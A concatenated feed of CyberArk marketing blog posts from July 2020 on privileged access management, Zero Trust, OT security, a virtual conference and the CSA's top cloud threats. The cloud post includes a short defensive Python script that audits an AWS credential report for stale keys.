As our CyberArk team wraps up a banner week of Impact Live – the world’s largest gathering of privileged access management (PAM) and identity and access management (IAM) professionals – we’re reflecting back on the major themes, takeaways and “Impact-ful” moments from our 14th annual event.

Connecting Our Fast-Growing CyberArk Community 

This year, CyberArk Impact was reimagined in an immersive virtual format, enabling attendees from around the globe to join us from the comfort of their homes or offices. While we missed being together in person, we’re thrilled that our packed agenda of over 40 keynotes, breakout and training sessions reached more than 10,000 registered attendees – making this our largest Impact yet!

It was truly incredible to connect and engage with our expanding CyberArk community, helping security leaders and practitioners deepen their expertise and providing actionable insights on PAM and access management solutions and techniques to help them secure their business. If you couldn’t make it this year, tune in for on-demand content anytime!

Navigating the Cybersecurity Challenges of the New Normal

It’s safe to say that the demands on cybersecurity professionals have never been greater. Throughout Impact Live, we heard first-hand accounts of the formidable challenges teams are facing as they defend against unrelenting attacks, while racing to enable new work models. And if their jobs weren’t tough enough already, today’s “new normal” creates even more complexity and urgency. Consider that within a few short months:

  • Traditional infrastructure boundaries evaporated (practically overnight) when employees went home to work.
  • The attack surface expanded exponentially as organizations ramped up RDP use and cloud adoption spiked to enable remote work.
  • Risky security practices by remote employees made security teams’ jobs even harder. For example, 77% of remote employees admit to using insecure, unmanaged personal devices to access corporate systems, including installing corporate VPNs on personal devices.
  • While 80% of all data breaches stem from stolen or lost credentials, nearly all remote employees say they re-use the same passwords across applications and devices.
  • Two-thirds of people working from home adopted new collaboration tools like Zoom and Microsoft Teams, which reported significant security vulnerabilities.
  • Virtually every geography and industry experienced a sharp increase in opportunistic attacks. While many threat actors employed tried-and-true techniques, others launched new and dangerous attacks, including the MAZE ransomware that crippled some of the world’s largest organizations.

Fueling Our Continued Innovation

We are proud to have been called upon to help restore secure operations to a number of these impacted environments. CyberArk has been referred to as “the second call” in incident response scenarios. This is because comprehensive, centralized privileged access management controls are critical to helping breached organizations regain trust that their environment is secure. As our teams work side-by-side with remediation experts to understand attack patterns, methods and motivations, we’re continuously feeding these invaluable insights back into the products and services we develop.

That’s also why events like Impact Live are so important to us. The insights we gain from cybersecurity leaders on the front lines directly inform our view of the future and strengthen our confidence as we continue to innovate.

Exploring Three Major Themes from Impact Live

Throughout these ongoing conversations – and particularly this week – three resounding themes have emerged:

1. In today’s mobile, digital and cloud world, all identities can become privileged under certain conditions. If not properly secured, they can open doors for attackers – as evidenced by last week’s highly publicized cyber attack on Twitter.

Here’s a brief overview: As part of a highly targeted social engineering attack, Twitter employee credentials were used to gain access to an internal administrative tool, hijack a number of high-profile social media accounts, then post messages to dupe social media users into donating bitcoin payments to fraudulent causes. This attack underscores the challenges many organizations face today in securing the growing number of identities that require privileged access to sensitive information and data.

2. The principles of least privilege are taking hold. Organizations are searching for ways to further reduce standing access and provide just the right level of access at just the right time using passwordless techniques that don’t disrupt employee workflows.

3. As security teams move quickly to address new realities, they’re covering the most ground while keeping costs down by adopting access management and PAM solutions delivered as a Service.

Sharing Our Identity Security Vision

On Day One of Impact Live, CyberArk Chairman and CEO Udi Mokady took to the keynote stage to share how we’re addressing these three themes, along with our plan to develop an expanded approach to securing identities – one with PAM at its core.

Building on the recent Idaptive acquisition, our Identity Security strategy begins with Zero Trust and uses artificial intelligence to understand context and intent. This approach will help organizations dramatically reduce risk while providing a seamless user experience that will securely enable the business and support any device, application or user – regardless of role or location.

“The traditional approach to managing and securing identities has become obsolete,” Mokady said during the keynote. “The incorporation of the Idaptive technology helps CyberArk extend its foundational strengths in privileged access management, a critical layer to delivering a security-first strategy for protecting access by a range of human, application and machine identities and the services they consume.”

We’re excited about this new chapter and energized by the stories, collaboration, feedback and discussions this week during Impact Live. Over the coming weeks, we’ll be sharing more details on the steps we’re taking to deliver on our Identity Security strategy – like adding support for Idaptive Multi-Factor Authentication across CyberArk products and services. Stay tuned!

]]>
How to Get the Most Out of Your Privileged Access Management (PAM) Program https://www.cyberark.com/blog/from-strategy-definition-to-reporting-how-to-get-the-most-out-of-your-pam-program/ Fri, 17 Jul 2020 21:48:26 +0000 https://www.cyberark.com/?p=96725

Privileged access continues to be a prime target for nefarious characters and poses a significant threat if your security controls are not operating effectively. This makes privileged access management a top business priority.

These five fundamental steps can help establish your Privileged Access Management program, define your risk tolerance and report on your outcomes.

Step 1: Define a PAM Risk Mitigation Strategy

Defining a comprehensive PAM strategy is a critical step to establish the key risks and priorities your program’s activities need to address. It will be influenced by a number of aspects, including the threat landscape, industry trends, audits and oversight requirements. A sound PAM strategy allows you to develop a risk mitigation plan, a roadmap for privileged access and a target operating model (TOM) that helps ensure the long-term sustainability of your controls.

Designing your PAM model will not only provide you with a long-term view of your risk mitigation strategy, but it will also allow you to consider short-term quick wins, such as delivering PAM controls that provide rapid risk mitigation with the least amount of effort – both technically and politically.

Figure 2. Risk prioritization methodology quadrant, CyberArk Blueprint.

The CyberArk Blueprint is a PAM framework that provides prescriptive guidance and best practice recommendations for PAM development. It comprises three guiding principles that make it easy to articulate the value of the PAM work being executed and why it’s important. This framework provides actionable risk reduction, which can be turned into a customized plan and roadmap that can later be used for reporting purposes.

Step 2: Establish a Baseline of Privileged Controls

You can’t protect what you don’t know exists. To protect privilege within your enterprise, it is essential to understand the current state of privilege within your enterprise. This includes the inventory of assets within your operating environment and the array of privileged accounts that are used to support them. Privileged accounts and credentials can be found everywhere – extending across Active Directory, *NIX, IaaS, PaaS, SaaS, SQL and many other IT, OT and business services. It’s important to scan systems on your network and cloud providers on a regular cadence to uncover privileged accounts, credentials, entitlements and misconfigurations that can pose a risk to your organization.

The data generated from the inventory will enable you to assess your level of risk based on your PAM framework and establish a set of targets and priorities for your implementation schedule. It will provide you with a set of numbers (i.e. 15 Windows domain accounts, 2,500 Windows server local admins, etc.) that will not only define your remediation strategy but will also establish a set of metrics that can be measured and reported against going forward.

One best practice to consider is integrating your PAM solution with vulnerability management and discovery technologies from vendors like Rapid7, Forescout and Tenable. This serves two purposes: providing security for the privileged credentials used to automatically sign-in to sensitive infrastructure environments and, at the same time, providing valuable insights into asset- and credential-based information that can help inform your migration strategy.

The only thing worse than having risk is not knowing where you have risk or how extensive that risk is!

Step 3: Evaluate the Strength of Existing Controls

Defining your PAM strategy and framework establishes your risk goals and tolerance. Meanwhile, your baseline of privileged controls delivers an inventory of both privileged accounts and technology assets. Understanding the state of the existing controls that protect privileged accounts and sensitive information within your assets is critical to defining the next steps of your action plans. Consider the following:

  • Existing governance and policy language around privileged accounts and asset management
  • Policies and procedures around provisioning, including gating, automation and signoffs
  • A complete review of privileged accounts, roles and responsibilities and entitlements that ensure they are appropriate
  • Security technology controls to protect, detect and monitor access
  • Continuous assessment and testing on a regular basis to validate and remediate the strength of controls

Assessments of these types of controls will provide you with a knowledge of the key areas where you need to focus your program, whether that means quick wins or longer term strategic plans, and will also provide intelligent information to feed either your existing mapping framework or your governance, risk management and compliance (GRC) tools. This will enable you to visually illustrate where you have controls in place, where they need to be strengthened and how they map to other industry or regulatory compliance requirements.

Figure 3. Example policy and controls table.

Understanding the state of your existing controls puts you in the risk driver’s seat. It allows you to demonstrate your remediation activities against your risk framework and alters the paradigm of having to rely on Audit to discover deficiencies, transforming it into a sound governance model.

Step 4: Design an Effective Reporting Framework

Developing executive reporting can be challenging as you balance the amount of data you produce with setting the right tone with the right message in your reports. It is essential that your reporting not only depicts progress, but also measures your achievements against your strategy and risk reduction against your framework. Your framework should also consider the audience you are reporting to – whether it is an executive oversight committee, PAM steering committee, Senior Leadership team, audit committees or the board of directors.

Generally, the reporting audience is interested in seeing material progress with the program; on pace to achieve the objectives and driving risk reduction aggressively. It is effectively a report that qualifies the investment in both resources and finances the organization has made towards the initiative.

The score card below (Figure 4) is an illustration of the program “at a glance,” providing a view of the PAM implementation strategy designed for CISOs and highlighting key areas of both progress and exposure. It measures accomplishments against a series of defined timelines and calls out risk levels based on a pre-established set of measures, typically defined by a CISO. At a glance, you can tell if projects are progressing and whether or not the current state of onboarding is operating within the risk tolerance levels.

Figure 4. PAM risk and implementation scorecard.

Step 5: Execute Your Reporting Strategy

Your reporting now becomes your narrative. It informs your leadership and oversight communities of the importance of the program, the progress achieved, issues that need to be managed and the level of risk mitigated as a result of the controls. The messages need to be succinct, concise and informative and will often need to be customized to the audience you are reporting to. Your reporting will be in the form of scorecards, dashboards, presentations and possibly open communications. The most important thing to remember is that your reporting sets the tone of your program. Understanding your audience, what they need to know and where they can help is fundamental to determining how you formalize your communications.

A wide variety of built-in reports – including inventory, entitlement and compliance reports – can be helpful in developing your scorecards and dashboards. Consider maximizing your time by leveraging automated processes to create your dashboards and scorecards. Exporting easily-ingested data into other business analytics and intelligence tools, such as Splunk, Tableau and PowerBI, is another best practice. Consider enriching the data with inputs from other inventory tools, entitlement databases and compliance reports for additional contextual awareness. Your reporting should also be capable of feeding your GRC tools so that the organization has a real time view of the risk and control landscape. Use the tools that you have at your disposal and get the most from your existing technology investments.

When it comes to an effective reporting strategy, perception becomes your new reality. Make sure you understand the audience you are reporting to and that you provide meaningful, transparent and clear communications regarding your program that set the appropriate tone. If you don’t, your reporting committees will draw their own conclusions and they will define the narrative for you.

More Than Just Technology

Securing privileged access is instrumental in mitigating the risk of a cyber-attack and maintaining business continuity. A successful PAM program is about more than just technology; it takes great people and well thought out processes to achieve optimal results.

Before you can report back the success of your PAM program, it’s critical that you get off on the right foot with a guided and prescriptive framework. Explore the CyberArk Blueprint now to start your journey to PAM excellence.

]]>
Security for the Modern OT Environment https://www.cyberark.com/blog/security-for-the-modern-ot-environment/ Thu, 16 Jul 2020 12:00:31 +0000 https://www.cyberark.com/?p=96430

Operational Technology (OT) – the hardware and software used to monitor, detect and control changes to devices, processors and events of industrial equipment – is a popular target for cyber attackers…and for good reason. Unauthorized access to critical Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) systems can wreak havoc on power stations, transportation networks and smart city infrastructure.

Because a breach of the OT environment could result in electric grids shutting down, alarm systems being disabled and ecological disasters from oil refineries, OT access is often air-gapped and has no connection to outside networks.

However, critical OT systems and applications still need to be accessed by operators, engineers and contractors from outside of the network. And, with many employees working remotely these days, secure access from various locations and authorized users is required. Many organizations rely on vendors and third parties to update their systems. Typically, they handle this by using a VPN or opening up the firewall.

While many OT network architectures include some level of security processes and protocols, traditional IT security products and solutions oftentimes can’t be used in an OT environment because they weren’t designed for it, making it easier for dedicated attackers to get through to their targets with things like worm malware or by exploiting employee or vendor access and masquerading as a trusted insider.

For security purposes within OT, the seven-layer model from Purdue Enterprise Reference Architecture (PERA) is often used to segment networks with three different zones, starting at the top with Enterprise, then Industrial Demilitarized Zone and, finally, the Manufacturing or Industrial Zone.

Finding solutions that provide the necessary security for OT environments while not hindering the productivity of remote users has long been believed to be a near-impossible task. In addition to simply providing secure remote access, different security protocols are needed for different types of sensitive assets – making the security landscape even more complex.

This often resulted in a choice between providing too much access in the name of operational use or providing too little access in the name of security. Either way, a team of security people is needed to manage the process. The end result is some combination of high costs or lost time for IT administrators and security teams alike.

Organizations with OT environments are in dire need of a solution that not only provides increased security for the most sensitive assets and environments, those on Level 0 and Level 1 of the PERA model, but which can also keep remote users happy and productive.

Effective security for OT environments starts with identifying any privileged accounts and credentials that are used to connect to SCADA systems, ICS, smart sensors and more, and properly securing access to these systems. All privileged accounts and credentials should then be secured and managed within an encrypted repository and rotated frequently.

Next, identify the users that require access and help ensure that tools are in place to keep these users productive, but also secure. This is where CyberArk can help.

CyberArk Alero provides security controls that give remote users access only to what they need, when they need it. The solution directly integrates with the CyberArk Privileged Access Security Solution to provide automatic session isolation that’s needed for Level 0 assets to ensure that potentially compromised endpoints never touch OT environment systems. For additional security, all sessions are automatically recorded and monitored and, in the event of anomalous or potentially malicious activities, can be remediated in real-time.

CyberArk Alero provides organizations with OT environments with an easy way to secure and enable remote access to critical applications and systems managed by CyberArk.

With CyberArk session management capabilities, as long as the session management server is pointed to the device and connected via a supported protocol (RDP, SSH, application, etc.), all sessions are automatically isolated, recorded and monitored. If the device isn’t able to connect to CyberArk’s session management capabilities, there are a variety of plugins or gateways that exist on CyberArk Marketplace or custom ones can be generated.

For more information on CyberArk’s approach to securing OT environments, visit us here.

]]>
Grow Up! Plotting Your Path Along the Zero Trust Maturity Model https://www.cyberark.com/blog/grow-up-plotting-your-path-along-the-zero-trust-maturity-model/ Wed, 15 Jul 2020 20:07:45 +0000 https://www.cyberark.com/?p=98935

From the philosophy behind it, to the technology that powers it, at Idaptive we’ve talked about Zero Trust a lot (see the list of the entire Zero Trust blog series at the bottom of this post). That’s a good thing because all big shifts in both strategy and approach take repetition, repetition, repetition (see what I did there?) before they gain universal understanding and buy-in. Let’s wrap up this series by highlighting six things you can do to move down the path to achieving a Zero Trust security posture.

1) Never trust, always verify

Zero Trust is actually pretty simple. It all starts with a mindset, and the mantra that guides it: “never trust, always verify.”

Don’t automatically trust users or devices because they have access to your network. Doing so assumes that your security perimeters are secure (hint: they’re not) and that you’re able to definitively separate the “good guys” from the “bad guys” as they enter your perimeter. Instead, organizations must shift their mindset and examine the context of every access attempt — regardless of where the resource resides — in order to verify every user, on every device, for every access attempt, every time.

This is easier said than done, but once an organization has transformed its security culture to place Zero Trust at the foundation, it simply becomes how security happens. That’s “never trust, always verify.”

2) Adopt MFA here, there, and everywhere

Hands down, multi-factor authentication (MFA) is the single-best line of defense against unwanted guests wielding compromised credentials. But the effectiveness of MFA is dependent on how it’s adopted and consistently used across an organization.

Malicious actors are like water flowing down a hill — they will always take the path of least resistance. If one of your users is not using MFA somewhere, they’re going to find that user and exploit that gap. Most companies today use pockets of MFA for only certain resources like VPN, or a different MFA solution for an individual application. This approach leads to varying and inconsistent user experiences, and leaves significant gaps where MFA is not applied.

Even with a consistent method to apply MFA capabilities across all apps and services, at best, users are prompted to verify their identity every time they access any resource (which can be annoying and impact productivity). At worst, MFA isn’t used on some apps and services, creating the path for bad actors to flow right into your networks.

For true Zero Trust, organizations should use a platform approach that applies MFA to every app and service and integrates with other features to improve users’ productivity instead of hindering it.

3) Avoid the use of VPN where possible, and adopt an application gateway instead

Supporting the shift to remote work has been at the top of every IT team’s to-do list over the last two months. Many companies have chosen to go the virtual private network (VPN) route. While good for a quick fix, VPN connections can often be pricey — and if not maintained and implemented properly — expose wide swathes of the corporate network to bad actors, when only limited access to certain critical applications is needed.

You could secure remote access in the short-term using MFA on the VPN instead of passwords alone, but a more Zero Trust-oriented solution is to provide VPN-less access directly to on-prem apps through an application gateway, limiting access to only those apps that a user needs. This mitigates the risk inherent in VPN connections, and replaces it with secure, behind-the-firewall access to individual on-premise applications.

By using a cloud-based gateway there’s no hardware to install or maintain, no firewall rules to change, and no need to provide full network access for external users (remote employees, but also vendors and partners.) It’s your IT team’s remote access wish list gift-wrapped in Zero Trust packaging.

4) Fuse single sign-on with MFA to maximize user productivity

Single sign-on (SSO) is a powerful tool that saves users hundreds of hours managing logins and businesses millions of dollars in boosts to productivity. Alone, it’s a double-edged sword that can greatly decrease an organization’s attack surface, but also increases the impact of a breach because of its centralized access.

But Zero Trust has an answer. SSO can be combined with MFA to form a potent pairing that eliminates the need to enter multiple passwords — without giving up the keys to the kingdom when one login is compromised. SSO and MFA together create additional layers of security that require both the user and their device to be verified, making access both secure and transparent for the end-user.

5) Balance security with usability through conditional and risk-based access

With SSO and MFA working in concert, the next step on the Zero Trust journey veers into what we call “Next-Gen Access” territory. Next-Gen Access marries these capabilities with artificial intelligence and machine learning to verify identity and make access decisions in real-time.

Whether using a recognized device from the office or a personal laptop from a remote location, conditional and risk-based access tools prompt users with just the right amount of security steps to verify authenticity every time — without sacrificing security. Next-Gen Access platforms do the heavy lifting to understand and assess user behavior, develop a unique model for each of them, and then grant access based on risk — so that security is properly balanced with a killer user experience.

6) Look for identity and access management solutions that work well together, and make integrating with your existing and future IT environment easier

Once you’ve come this far, you’ve probably realized that the key to Zero Trust is picking the right tools for the job. It’s critical that you pick identity and access management solution(s) that work well together, and can integrate with your existing and future IT environments with ease.

Find a vendor that has capabilities for each of the use cases I discussed here today, instead of just one. Most companies that stumble on this leg of the journey tend to do so when they try a hodgepodge of different vendors and aren’t able to create the uniformity and consistency needed for a truly Zero Trust security posture. Look for a platform that offers strong partnership and support offerings with other solutions, and a rich history of excellence around Zero Trust, and that can walk you down the path.

Reaching Zero Trust maturity

So what happens to organizations that adopt a Zero Trust strategy? In addition to protecting valuable business, customer, or partner data — studies have shown that mature Zero Trust organizations experienced 50% fewer breaches. They also spent 40% less on technology related to identity and access management when taking a platform approach versus buying and integrating individual IAM products, because everything is integrated. An integrated solution avoids a lot of the extra effort required when managing different products, infrastructure, IT systems, applications, and more. And it costs less to adopt a platform for Zero Trust identity than to try to piecemeal a solution together.

Perhaps more valuable though, a Zero Trust security strategy creates an organization that’s empowered to get things done. In a separate Forrester report, businesses that had adopted Zero Trust had twice the confidence in their ability to drive new business models forward and bring digital experiences to market. In addition, 66% were more confident in adopting mobile and remote work models, which, even after COVID-19 subsides, will continue to be paramount in our new, post-coronavirus reality.

Better security and fewer breaches should be table stakes, but improving productivity, user experiences, and bringing value to customers are what defines successful companies. That’s what this approach to security can do. That’s Zero Trust.


Related resources:

White paper: The Rise of AI-Powered Identity Security

Webinar: Achieve Zero Trust with Idaptive


Read the Zero Trust series here:

Zero Trust Series – 1  What Is Zero Trust and Why Is it So Important?

Zero Trust Series – 2 Like the Night King, Perimeter Defense is Dead

Zero Trust Series – 3 Imposter Syndrome: Why You Can’t Separate the “Good Guys” from the “Bad Guys”

Zero Trust Series – 4 Passwords are Just one Piece of the Cybersecurity Puzzle

Zero Trust Series – 5 The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance

Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

]]>
Are You Ready for Impact Live? 7 Reasons to Register Today https://www.cyberark.com/blog/are-you-ready-for-impact-live-7-reasons-to-register-today/ Wed, 15 Jul 2020 12:00:14 +0000 https://www.cyberark.com/?p=96416 Identity Security

On July 21 and 22, CyberArk will host Impact Live, a virtual version of CyberArk Impact – the premier event for privileged access management (PAM) and identity and access management (IAM) professionals. This year, CyberArk Impact has been reimagined in a virtual format that will allow attendees from around the world to explore the cutting edge of PAM and identity security from the comfort of their personal workspaces.

This year’s agenda is packed with keynotes, sessions and workshops geared to a range of industry experience and technical depth.

Here are the top seven reasons to attend our event (did we mention, it’s free?):

  1. Explore the Future of Identity Security

Impact Live will host insightful keynotes that outline CyberArk’s vision and approach to identity security, so that you can be in the best position to shape your modern privilege and access management programs. As more organizations move to support a more remote workforce, the message ‘identity is the new perimeter’ could not ring more true. In parallel, the idea that any identity can be privileged under certain conditions is becoming more of a reality. These key themes will be covered on the main stage with additional topics to include:

  • CyberArk’s identity security vision
  • Securing privileged access in a hybrid world
  • Securing the remote workforce in the new norm

  2. Learn About Idaptive

On May 13, CyberArk acquired Identity-as-a-Service leader Idaptive. Together, CyberArk and Idaptive will provide a comprehensive, security-first approach to managing and protecting all types of identities in the cloud and in on-premises environments.

Idaptive will be a key topic across all Impact Live content. Attendees interested in learning more about Idaptive’s AI-powered access management capabilities can also attend the following breakout sessions:

  • Identity Assurance with Adaptive Multi-Factor Authentication (MFA)
  • Identity Management with Modern Single Sign-On
  • Building a Secure Source of Truth to Automate Identity Lifecycle Management

  3. Benefit Your Business by Learning PAM Best Practices

Impact Live attendees can customize their agenda to develop essential PAM skills. These sessions align with the CyberArk Blueprint for PAM Success, a simple, prescriptive framework for building an effective PAM program.

With over 40 unique breakout sessions and hands-on technical training, Impact Live will help attendees maximize the value of their PAM investment across the enterprise, whether that’s through streamlining audit and compliance or using threat analytics to detect risky behavior.

Training and breakout sessions will explore PAM best practices, including:

  • PAM 101: Core Basics of a Successful Privileged Access Management Program
  • Remote Risk: Securing Remote Vendor Access
  • Native Access for Privileged Session Management: UX is King
  • Access Control and Linux: Best Practices for Risk Reduction and Accountability
  • Configuring Just-In-Time Access
  • Enforcing Least Privilege on the Endpoint
  • Preventing Ransomware and Credential Theft Attacks on the Endpoint

  4. Expand Your PAM Skillset: Address Digital Transformation and Emerging PAM Challenges

One focus of Impact Live is providing attendees with the information they need to address emerging cybersecurity threats and security challenges driven by digital transformation. Impact Live’s breakout sessions and training will feature demonstrations of CyberArk products, services and open source tools to help attendees solve advanced challenges.

These sessions include:

  • Breaking the Cloud Using Five Different Methods
  • CI/CD and Development Environments – The Achilles Heel That Attackers Are Exploiting
  • Renegade Robots: The CISOs Take on Securing Robotic Process Automation
  • Securing In-House Applications with Application Access Manager

  5. Interact with CyberArk and PAM Experts

Despite being virtual this year, Impact Live will offer several opportunities to discuss industry topics with, and learn from, peers and CyberArk technical experts.

Discovery Center booths will provide a deep dive into areas like:

  • Managing risk in multi-cloud environments
  • Identity-as-a-service
  • Secure apps, tools, containers and DevOps
  • Implementing least privilege on the endpoint

Additionally, attendees can discuss PAM program roadmap design with experts from our event sponsors: Optiv, KPMG and PwC.

And, of course, CyberArk technical experts will be directly available to attendees. There will be dedicated ‘Ask the Expert’ Q&A sessions where experienced professionals weigh in on your security challenges.

  6. Earn CPE Credits and Discounts on CyberArk Certification

We believe ongoing education is essential to keeping up with the shifting landscape of security technology. Impact Live attendees can earn up to 30 Continuing Professional Education (CPE) Credits towards a variety of industry accreditations through organizations such as ISC2. We will also provide attendees with the opportunity to earn discounts on CyberArk Certification Exams and training courses by participating throughout the event.

By participating in training at Impact Live, attendees can develop in-demand skills to accelerate the adoption, productivity and ROI of their organization’s CyberArk PAM deployment.

  7. It’s Free and Global!

CyberArk Impact Live removes the need for travel and budget to attend the premier event for PAM and IAM professionals. Regional agendas provide guidance as to when sessions will stream live in your time zone, so you can join the event and catch premium content regardless of your geographic location.

No matter what your area of interest, Impact Live has you covered. Explore the agenda to find the sessions that are right for you. You can join Impact Live from anywhere in the world at no cost to you or your organization. Why not explore whatever makes you curious?

Ready to build your knowledge of the world of PAM and identity security? Register for Impact Live Today.

The Egregious 11: Examining the Top Cloud Computing Threats https://www.cyberark.com/blog/the-egregious-11-examining-the-top-cloud-computing-threats/ Thu, 09 Jul 2020 12:00:17 +0000 https://www.cyberark.com/?p=95704 Cloud Security

Each year, the Cloud Security Alliance (CSA) releases its “Top Threats to Cloud Computing” study to raise awareness of key risks and vulnerabilities in the cloud and promote strong security practices.

The latest edition, The Egregious 11, ranks the top eleven cloud threats and provides recommendations for security, compliance, risk and technology practitioners. This installment reflects the widespread surge in cloud use and overall maturation in organizations’ understanding of cloud environments. However, it hints at continued over-reliance on cloud vendors to protect workloads, a troublesome trend we also observed in the CyberArk Global Advanced Threat Landscape 2019 report.

The CSA recorded a drop in rankings of traditional cloud security issues under the responsibility of cloud service providers – such as denial of service, shared technology vulnerabilities and CSP data loss – suggesting these issues are less of a concern for organizations than in years past. The biggest threats now come from issues like misconfigurations and insufficient identity access management where the customer is solely responsible for security.

As organizations utilize the cloud to enable remote work and accelerate digital transformation, there is a need to understand where potential security risks exist and address them head on. Here’s a look at five of the “Egregious 11,” along with steps organizations can take to strengthen their security posture. To explore all 11 cloud security challenges, along with CSA recommendations, check out the full study.

Data Breach

With the average total cost of a data breach now at $3.92 million, it’s unsurprising this is ranked as the number one cloud threat. Cyber attackers are after data – particularly personal information – and data accessible via the Internet is the most vulnerable asset to misconfiguration or exploitation. As more data shifts to the cloud, effectively protecting it begins with the question, “Who has access to this?”

Misconfiguration and Inadequate Change Control

Misconfigurations – including granting excessive permissions or unchanged default credentials – occur when computing assets and access are set up incorrectly. Misconfiguration of cloud resources is a leading cause of data breaches and can result in deleted or modified resources and service interruptions. The dynamic nature of the cloud makes traditional change control approaches for proper configuration extremely difficult.

To overcome cloud misconfiguration maladies, the CSA urges organizations to embrace automation tools that can continuously discover issues like unmanaged privileged accounts and instances to prevent misuse.

Insufficient Identity, Credential, Access and Key Management

The cloud introduces a host of changes and challenges related to identity and access management (IAM) and particularly to privileged access management (PAM), since privileged credentials associated with human users as well as applications and machine identities are exceptionally powerful and highly susceptible to compromise in cloud environments.

Once an attacker obtains privileged credentials, they can gain full access to sensitive databases, or even to an organization’s entire cloud environment. Attackers know this. Many recent attacks targeting IaaS and PaaS environments have exploited unsecured credentials, resulting in cryptojacking, data breaches and destruction of intellectual property and other sensitive data.

The CSA stresses the need for strict IAM controls for cloud users and identities including following the principle of least privilege to protect privileged access to high-value data and assets. It also notes that cloud access keys (e.g., AWS access keys, Google Cloud keys and Azure keys) must be rotated and centrally managed, while unused credentials or access privileges are removed.
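As an added example (not from the CSA study or CyberArk’s post), the following Python turns the rotate-and-remove recommendation into a check over an AWS IAM credential report: it flags active access keys older than a rotation window and keys or console passwords that have gone unused. The column names follow the CSV that `aws iam get-credential-report` returns; the users, ARNs, dates and thresholds are constructed assumptions for this example.

```python
import csv
import io
from datetime import datetime, timezone

# Thresholds are assumptions for this example; use the values your standard requires.
MAX_KEY_AGE_DAYS = 90   # an active key older than this should already have been rotated
MAX_IDLE_DAYS = 60      # a credential unused for this long is a removal candidate

# Constructed sample report. Column names match the AWS IAM credential report CSV
# (a subset of its columns); the users, ARNs and dates are made up for this example.
SAMPLE_REPORT = """user,arn,user_creation_time,password_enabled,password_last_used,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date
<root_account>,arn:aws:iam::123456789012:root,2019-01-10T09:00:00+00:00,not_supported,2020-06-30T12:00:00+00:00,true,true,2019-01-10T09:00:00+00:00,2020-06-25T10:00:00+00:00,false,N/A,N/A
ci-deploy,arn:aws:iam::123456789012:user/ci-deploy,2019-11-01T08:00:00+00:00,false,no_information,false,true,2020-05-15T08:00:00+00:00,2020-06-30T07:00:00+00:00,true,2019-11-01T08:00:00+00:00,2020-01-03T11:00:00+00:00
contractor-old,arn:aws:iam::123456789012:user/contractor-old,2018-03-02T08:00:00+00:00,true,2019-12-20T15:00:00+00:00,false,true,2018-03-02T08:00:00+00:00,N/A,false,N/A,N/A
"""

# Fixed reference date so the example is reproducible offline.
NOW = datetime(2020, 7, 1, tzinfo=timezone.utc)


def parse_report_time(value):
    """Convert a credential report timestamp; N/A and no_information mean 'never'."""
    if value in ("N/A", "no_information", "not_supported", ""):
        return None
    return datetime.fromisoformat(value)


def days_since(moment, now):
    """Whole days between a report timestamp and the reference date."""
    return (now - moment).days


def audit_credential_report(report_csv, now=NOW):
    """Apply the rotation and unused-credential checks to every row of the report.

    Returns a list of (user, finding, detail) tuples, where finding is one of
    'stale_key', 'idle_key' or 'idle_password' and detail is the key slot ('1'/'2')
    or an empty string for password findings.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        user = row["user"]

        # Console password that nobody has used recently: disable or remove it.
        if row["password_enabled"] == "true":
            last_used = parse_report_time(row["password_last_used"])
            if last_used is None or days_since(last_used, now) > MAX_IDLE_DAYS:
                findings.append((user, "idle_password", ""))

        # Each IAM user can hold two access keys; check both slots.
        for slot in ("1", "2"):
            if row[f"access_key_{slot}_active"] != "true":
                continue
            rotated = parse_report_time(row[f"access_key_{slot}_last_rotated"])
            last_used = parse_report_time(row[f"access_key_{slot}_last_used_date"])

            # Rotation window exceeded: the key has been valid too long.
            if rotated is not None and days_since(rotated, now) > MAX_KEY_AGE_DAYS:
                findings.append((user, "stale_key", slot))

            # A key that was never used counts as idle since it was created or rotated.
            last_activity = last_used or rotated
            if last_activity is not None and days_since(last_activity, now) > MAX_IDLE_DAYS:
                findings.append((user, "idle_key", slot))
    return findings


def users_needing_action(findings):
    """Distinct users with at least one finding, for a ticket or report."""
    return sorted({user for user, _, _ in findings})


if __name__ == "__main__":
    for user, finding, detail in audit_credential_report(SAMPLE_REPORT):
        print(f"{user:16} {finding:14} {detail}")
```

On a real account, feed the function the decoded `Content` of the credential report instead of `SAMPLE_REPORT` and pass the current time as `now`.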

Account Hijacking

Using phishing methods, vulnerability exploitation or stolen credentials, malicious attackers look for ways to access highly privileged accounts in the cloud, like cloud service accounts or subscriptions. Account and service hijacking means full compromise: control of the account, its services and the data within. The fallout from such compromises can be severe – from significant operational and business disruptions to complete elimination of organization assets, data and capabilities.

To protect against account hijacking, the CSA recommends defense-in-depth and strong IAM and PAM controls, such as credential lifecycle and provisioning management and segregation of duties.

Insider Threats

Malicious insiders can be current or former employees, contractors or other trusted third parties who use their access to act in a way that could negatively affect the organization. Since insiders have legitimate access, pinpointing potential security issues can be extremely difficult and remediating incidents can be costly. According to the Ponemon Institute’s 2020 Cost of Insider Threats Study, the average global cost of insider threats rose by 31% in two years to $11.45 million and the frequency of incidents spiked by 47% in the same time period.

Whether it’s a privileged user abusing their level of access or inadvertently misconfiguring a cloud resource, having a PAM program in place to protect from these insider abuses is paramount.

Don’t Be An Egregious Offender. Secure Your Cloud with PAM

The cloud has fundamentally changed the notion of privilege. Now, even ordinary user credentials in the cloud and DevOps environments can hold as much power as administrator-level credentials do for other types of systems. Add in a complex and highly dynamic mix of machines and applications and the privilege-related attack surface grows dramatically.

Poor cloud security practices will inevitably lead to a breach or failed audit and force organizations to slow down – something that simply isn’t an option in the always-on, ultra-competitive digital era.

Strong privileged access controls help ensure that humans, applications and machines have only the necessary levels of access to sensitive applications and infrastructure to do their jobs and that activities occurring within the cloud environment aren’t risky (or if they are, privileged access controls enable SecOps teams to take swift action).

